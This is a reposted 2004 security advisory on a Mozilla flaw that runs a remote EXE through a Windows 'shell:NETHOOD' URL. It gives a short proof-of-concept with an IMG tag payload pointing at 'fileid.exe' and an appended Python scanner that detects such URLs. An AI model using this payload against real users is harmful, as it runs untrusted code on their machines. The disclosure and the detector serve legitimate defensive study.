[Repost] SHELL can execute remote EXE program

SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu <liudieyu@umbrella.name>
                  #
[START] Advisory


COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )



TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709



PROCESS
-------
Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p".
This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD"


At last, make MOZILLA request the following URL:


shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe


A file named "fileid.exe" in the "shared" folder will be executed.



REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.


WINDOWS supports "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research, and Cheng Peng Su for his
original discovery.


liudieyu
http://umbrella.name



            #
[START] PROOF OF CONCEPT
          ###
<!--
MOZILLA REMOTE COMPROMISE DEMO


REPLACE "[" WITH "<", and REPLACE "]" WITH ">".


!!!!! WARNING !!!!!
THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.


PROCESS:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
"X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER
AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER.



CREATED BY:
"Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME


COPYRIGHT:
This Demo is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu@umbrella.name)
-->


[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]


http://seclists.org/lists/fulldisclosure/2004/Jul/0425.html
qq310926 is the only account I use; anyone using another number and claiming to be 邪八冰血封情 is not me.
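
A defensive check for the pattern the advisory describes, added here as an example and not part of the original advisory or post: it scans HTML (for instance at a mail gateway or proxy) for URL-bearing attributes whose scheme is "shell:". The names `URL_ATTRS`, `url_scheme`, `ShellUrlFinder` and `find_shell_urls` and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes that make a browser fetch or navigate to a URL (assumed list).
URL_ATTRS = {"src", "href", "background", "action", "data", "lowsrc"}
# Browsers drop tab/CR/LF inside URLs and ignore leading control chars/spaces.
_STRIP = re.compile(r"[\t\r\n]")
_SCHEME = re.compile(r"[\x00-\x20]*([A-Za-z][A-Za-z0-9+.\-]*):")

def url_scheme(value):
    """Return the lower-cased scheme of an attribute value, or None."""
    m = _SCHEME.match(_STRIP.sub("", value))
    return m.group(1).lower() if m else None

class ShellUrlFinder(HTMLParser):
    """Collects (line, tag, attribute, value) for every shell: URL attribute."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser has already lower-cased names and decoded entities
        # such as "sh&#101;ll:" in the attribute values.
        for name, value in attrs:
            if name in URL_ATTRS and value and url_scheme(value) == "shell":
                self.hits.append((self.getpos()[0], tag, name, value))

def find_shell_urls(html, debracket=False):
    """Scan markup; debracket=True also reads the advisory's [TAG] notation."""
    if debracket:
        html = html.replace("[", "<").replace("]", ">")
    finder = ShellUrlFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

# Constructed sample: line 2 is the advisory's form, lines 3-4 are case and
# entity variants, lines 5-6 are benign and must not be flagged.
SAMPLE = r'''<html><body>
<img src="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">
<a href=" SheLL:NETHOOD\x">a</a>
<img src="sh&#101;ll:NETHOOD\x">
<a href="http://example.org/shell:docs">ok</a>
<p>shell:NETHOOD mentioned in text only</p>
</body></html>'''

if __name__ == "__main__":
    for line, tag, attr, value in find_shell_urls(SAMPLE):
        print(f"line {line}: <{tag} {attr}={value!r}>")
```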